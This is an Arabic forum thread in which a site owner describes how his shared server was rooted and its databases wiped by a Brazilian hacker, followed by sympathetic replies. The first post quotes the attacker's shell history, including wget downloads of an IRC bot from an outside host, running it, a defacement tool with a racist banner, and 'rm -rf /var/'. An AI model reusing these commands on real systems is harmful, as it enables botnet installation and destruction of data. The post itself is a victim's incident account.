صفحة 1 من 6 123456 الأخيرةالأخيرة
النتائج 1 إلى 15 من 83

الموضوع: شكر وتوضيح وعودة

  1. #1

    شكر وتوضيح وعودة



    الإخوة الأعزاء/ مشرفو وأعضاء منتدى سوالف سوفت
    السلام عليكم ورحمة الله وبركاته

    نعلم ان الدنيا متقلبة ولا تبقى على حال ، ولا بدمن حصول الألم لكل نفس سواء كانت مؤمنة او غير مؤمنة. كما نعلم اخواني الكرام ان الله سبحانه وتعالى لا يقدر شرا محضا ليس فيه خير ، بل كل ما قدر وإن ظهر لنا أنه شر كله فإن من وراءه من الخير مالا يعلمه إلا الله.

    إخواني الكرام ، فكما والله احزنني ماحدث للموقع من اختراق وتدمير من قبل مجموعة الهاكر البرازيلية فقد والله افرحني كثيرا وأثلج صدري ماقرأته من ردودكم وتفاعلكم معي ، مع علمي بأني لا أستحق ماذكر عني ولم اقدم الا اليسير لإخواني بسبب كثرة الأعمال ، فجزاكم الله خيرا وبارك فيكم. وقد سررت كثيرا جدا بعدد الذين استفادوا مما يقدم في موقع قهوة نت ، فالحمد لله رب العالمين ، وعسى أن تكرهوا شيئا وهو خير لكم.

    * ماذا حدث وكيف حدث الاختراق ؟
    ماحدث لم يكن اختراق لموقع قهوة نت فقط ولكن كان اختراق كامل للسيرفر المستضيف لموقع قهوة نت. وهذا السيرفر هو سيرفر خاص ، وأنا احد المسؤولين عن هذا السيرفر. السيرفر تم تحديث جميع برامجة الى احدث النسخ قبل الاختراق مثل برنامج Apache و PHP و FrontPage و mod_ssl وغيرها.
    المخترق وهو كما ذكره الإخوان هنا هو R0NiN وهو من البرازيل ،، بطريقة ما استطاع اختراق السيرفر ومن ثم اضاف مستخدم له صلاحيات root . اي بمعنى اخر تحكم كامل في السيرفر. ثم قام بحذف مجلد /var من السيرفر حذفا كاملا. وتعلمون ان هذا المجلد يحتوي على قواعد البيانات للسيرفر كاملة. أي ان جميع قواعد البيانات لجميع المواقع تم حذفها كاملا بأمر واحد لا يتعدى عدد من الأحرف. بعض قواعد البيانات في السيرفر كان حجمها 1 جيجا بايت !!!!! .
    ثم بعد ذلك بحث عن ملفات بامتداد .mdb لعله يجد قواعد بيانات الأكسس كي يقوم بمسحها هي الأخرى ولكن لم يجد شيئا. وهذا يدل على انه كان يريد فعلا أن يمسح قواعد البيانات ولم يكن حذفه لقواعد البيانات في مجلد /var هو لإخفاء اثاره كما ذكرت الشركة المستضيفة للسيرفر. وهذه بعض الأوامر التي اخذت من bash_history والتي تم تنفيذها بواسطة المخترق :

    كود:
    w
    cd /tmp
    mkdir .r
    wget http://aneurismcrew.port5.com/bot
    cd .r
    wget http://aneurismcrew.port5.com/bot
    wget http://aneurismcrew.port5.com/neoscript
    wget http://aneurismcrew.port5.com/initdata
    mv initdata INITDATA
    ./bot -sirc.brasnet.org -p6666 -nNaziGirl -aneoscript >/dev/null &
    chmod +x bot
    ./bot -sirc.brasnet.org -p6666 -nNaziGirl -aneoscript >/dev/null &
    ls
    cd tmp
    wget ftp://dndepice:darkmantle@<a href="h...com/cancer</a>
    chmod +x cancer
    echo s4bb4th In your *nix system .. Greetz: R0NiN > fuck.txt
    ./cancer fuck.txt
    |        * White Pride *        |
    +-------------------------------+
    - /*index.*             are now ->  "fuck.txt".
    rm -rf /var/
    w
    ls
    cd root
    ls
    ls -la
    car .bash_profile
    cat .bash_profile
    cat .bashrc
    cat .bash_logout
    w
    uname -a
    ls
    cd /
    ls
    cd tmp
    ls
    cat fuck.txt
    ps ax
    ls
    BitchX
    find / -name *.mdb
    cd bot
    cat bot
    w
    ls
    ls -la
    cd .r
    ls
    ./bot
    cat INITDATA
    cat neoscript
    ls
    cd ..
    ls
    ls -la
    cd .l
    ls
    cd psybnc/
    ls
    cat psybnc.conf
    ls
    انظروا الى سطر الأمر هذا:
    rm -rf /var/
    بكل بساطة ،، وضع امر حذف للمجلد /var !!!!!!!!!!!!!!!!


    أما عن كيفية الإختراق فهذا مالم نستطع التعرف عليه حتى الآن وهو المشكلة الكبرى حاليا ، ولا أعتقد حقيقة أنه ثغرة في النيوك استطاع من خلالها الوصول الى مستخدم root للسيرفر ولكن لا أستطيع الجزم بذلك ايضا. هناك رأي اخر وهو ان الاختراق تم عن طريق mysql وذلك بسبب أنه قبيل الاختراق مباشرة وردت رسائل الكترونية كثيرة الى المشرف على السيرفر تفيد ان خادم الداتابيس MySql Server يتوقف بشكل متكرر ، ولكن حقيقة لا نعلم كي تم الإختراق.

    * عائدون ان شاء الله
    تم المفاهمة مع الشركة المستضيفة للسيرفر وهي شركة فنيشرز اون لاين بعمل إعادة تركيب لبرامج السيرفر وذلك لتلافي اي برامج أخرى تم وضعها في السيرفر من قبل المخترق. ومن تيسير الله سبحانه وتعالى اننا قمنا بعمل نسخة احتياطية من فترة ليست بالبعيدة لبعض قواعد البيانات ومن ضمنها موقع قهوة نت ، وسوف نقوم باسترجاعها حالما يكون السيرفر جاهزا للعمل.

    * وأخيرا
    اود ان اتقدم بالشكر والعرفان للمسؤولين عن هذا الصرح الشامخ ، سوالف سوفت ، وأسأل الله العظيم ان يجزل لهم الأجر والمثوبة ، كما أود ان اشكر اعضاء منتدى سوالف سوفت على مبادرتهم الطيبة والتي تنم عن طيب معدنهم وتكاتفهم وتعاونهم في سبيل بذل الخير للجميع.

    شكرا لكم جميعا ،،، وعـــــــــــــــــــــــــــــــــــائدون ان شاء الله.


    اخوكم / خالد
    قهوة نت





    __________________
    خالد
    قهوة نت غير متواجد حالياً


  2. #2
    عضو سوبر نشيط
    تاريخ التسجيل
    Sep 2003
    المشاركات
    696

    السلام عليكم



    انشاء الله كل شي يرجع مثل اول واحسن

    وتقريبا الاختراق عن طريق mysql وهو الاقرب جدا

    نتمي العوده قريبا حتي تكون عود في اعيونهم والله يكون بالعون

    انشاء الله

    وانا على استعداد ادعملك في موقع مساند ومجاني بدون مقابل

    احتياط للموقع الاول باي مساحه ترغب فيها





    __________________
    email# mazaje@gmail.com
    مرعوب غير متواجد حالياً

  3. #3
    عضو نشيط جدا
    تاريخ التسجيل
    Mar 2003
    المشاركات
    357


    الله يقويك اخوي

    بصراحة اختراق السيرفرات صار مثل شرب الماء

    كل اللي اقدر اقوله ..

    الله يهبك النجاح و يقويك في وجه الاعداء

    ولو محتاج اي خدمة انا مستعد

    تحياتي لك





    __________________
    أكبر تجمع ادبي ثقافي عربي في عالم الإنترنت
    HTTP://WWW.AWRAG.COM
    Only dream غير متواجد حالياً

  4. #4
    عضو نشيط
    تاريخ التسجيل
    Oct 2003
    المشاركات
    54


    عودا حميدا باذن الله





    __________________
    إستخدم ملفك الخاص لكتابة توقيعك
    Design4Arab.net غير متواجد حالياً

  5. #5
    عضو فعال
    تاريخ التسجيل
    Feb 2003
    المشاركات
    1,168


    الحمد لله
    أثلجت صدورنا
    عوداً حميداً بإذن الله

    :app:






    __________________

    أطلبوا العلم من المهد الى اللحد
    ________________________________________________________________________
    :::::::::: الحدث العربي :::::::::: دليل المعارض العربية :::::::::: http://www.arabevent.com ::::::::::
    arabevent غير متواجد حالياً

  6. #6
    عضو فعال
    تاريخ التسجيل
    Nov 2002
    المشاركات
    1,131


    الحمد لله

    اسعدتنى بالتغلب على هذا الاختراق بعودتك..

    مع انى لا استخدم النيوك لكن موقعك فعلاً كنز للمعلومات





    __________________
    System
    KaRiM_NET غير متواجد حالياً

  7. #7
    عضو نشيط جدا
    تاريخ التسجيل
    Apr 2001
    المشاركات
    488


    الله يرحم والديك ... والله رجوعك هو أكبر مكسب .." ريحتنى الله يريحك"

    نحتاجك بهذه الطلة المليئة بالتفائل .. وانت الان ترسخ هذا المفهوم" من عرف الله هانت مصيبته"
    " ومن شاف مصيبة غيره هانت مصيبته "

    اخوي خالد .. يقول المثل واثق الخطوة يمشي ملكا .. وانت ملكت هذه الثقة بحب الناس لك وحبك لهم ... وستضل ملك بأعين الجميع
    لا اريد ان استطرد كثير في ديباجة ممكن ما تغنيك ولاتسمن من جوع ... ولاكن اقول لك "موفق لكل خير باذن الله "
    وياعلها انشاء الله اخر المصايب





    __________________
    Has been gone
    FAISAL1 غير متواجد حالياً

  8. #8
    عضو نشيط جدا
    تاريخ التسجيل
    Jun 2003
    المشاركات
    503


    بتوفيق ان شاءالله
    نعم اخي ان الدنيا متقلبة ولا تبقى على حال الا وجهه سبحانة
    ونسئل الله ان يكون ما حدث فيه خير لقهوه نت والقائمين علي الموقع
    ننتظر عودتكم استاذ خالد





    __________________
    يارب إن عظمت ذنوبي كثرة فلقد علمت
    بأن عفوك أعظم إن كان لا يرجوك إلا محسن فبمن يلوذ ويستجير المجرم
    shmoa غير متواجد حالياً

  9. #9
    عضو فعال
    تاريخ التسجيل
    Oct 2003
    المشاركات
    1,264


    هلا اخوي خالد (( قهوة نت ))
    كلامك جداااااا جميل لانك سترجع انشاء الله
    وبقوة والرجال لا يخاف عليهم والي الامام بارك
    الله فيك اخوي ننتظر السرح الكبير مدرسة التكنلوجيه (( قهوة نت ))






    __________________
    (( لا تنسي ذكر الله ))
    ليس الجمال بأثوبا تزيننا ان الجمال جمال العلم والادب
    المشوار غير متواجد حالياً

  10. #10
    عضو سوبر نشيط
    تاريخ التسجيل
    Jun 2003
    المشاركات
    874


    بإذن الله سوف يكون العود احمد فنحن معك في الرخاء والشدة ...





    __________________
    سبــــحان الله وبحمـــده ... ســـبحــان الله العظــيــم
    ---------------------------------------------------

    مدونة Wiipod
    .
    .
    البراك غير متواجد حالياً

  11. #11
    عضو نشيط جدا
    تاريخ التسجيل
    Oct 2003
    المشاركات
    551


    مبرووووووووووك





    __________________
    Hmoud B. Al Qahtani
    Tasjeel.com
    FLy غير متواجد حالياً

  12. #12
    عضو فعال
    تاريخ التسجيل
    Nov 2002
    المشاركات
    1,092


    أخي الكريم قهوة نت
    إهنئك على هذا الصرح
    و أهنئك على هذا الإصرار للوصول إلى القمة
    أهنئك على إحتسابك الأجر
    إهنئك لأنك إنسان صابر وخير
    أهنئك على الاجر الذي نلته والذي ستناله بإذن الله
    وأسأل الله أن أكون مثلك
    قدمت لأمتي
    مافيه خير لها
    ويكفيك دعا الناس لك والحمد لله
    وأسأل اللله أن يرزقك مالا و أهلا و ولداً
    وياأخي الكريم لو أردت أي خدمة بإذن الله
    لن أقصر معك
    سواء بالتصميم أو البرمجة

    وأشهد الله أني أحبك فيه


    والسلام عليكم ورحمة الله وبركاته
    أخوك أبو أنس
    جدة
    4/1/2004
    الساعة 3.4 PM





    __________________
    البريد
    almuslim@gmail.com
    الماسنجر
    muslem@php.net
    Mr.Muslem غير متواجد حالياً

  13. #13
    عضو نشيط
    تاريخ التسجيل
    Oct 2003
    المشاركات
    298


    الأخ الكريم قهوة نت..

    الرسول صلى الله عليه وسلم يقول في الحديث الشريف:

    ((عجباً لأمر المؤمن ، إن أمره كله خير . وليس لأحد إلا للمؤمن ، إن أصابته سراء شكر فكان خيراً له ، وإن أصابته ضراء صبر فكان خيراً له )) رواه مسلم.


    وكلمة أخرى اخي الكريم..

    الي قدر يبني الموقع ويؤسسه من الصفر.. لن يكون من الصعب عليه أن يصلح ما دُمر

    وبما انه عندكم نسخة من قاعدة البيانات فهذا شيء طيب ومن توفيق الله سبحانه.


    تقبل تحياتي وبالتوفيق اخي الكريم.





    __________________
    ________________________

    (¯`·._ مملكة بروق _.·`¯)
    [/URL]
    ________________________
    رهين غير متواجد حالياً

  14. #14
    مـراقـب
    تاريخ التسجيل
    Apr 2001
    المشاركات
    4,264


    مبروك والحمدلله على السلامة

    لا أنسى انك العربي الوحيد الذي استفدت من أحد برامجه وهو برنامج القرآن الكريم فقد قمت بتحويله لموديل لمجلة xoops

    http://www.dndon.com/modules/quran/





    __________________
    لاَ اِلَهَ اِلاَّ اَنْتَ سُبْحَانَكَ اِنِّي كُنْتُ مِنَ الظَّالِمِينَ
    Fuga غير متواجد حالياً

  15. #15


    هكذا فليكن الاصرار على النجاح ...
    مهما كلف الأمر ..
    مزيدا من التقدم نتماه لكم





    __________________
    لا عز لنا الا بالاسلام
    ابو اسامه الحضرمي
    www.emtyz.com
    التريمي غير متواجد حالياً





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض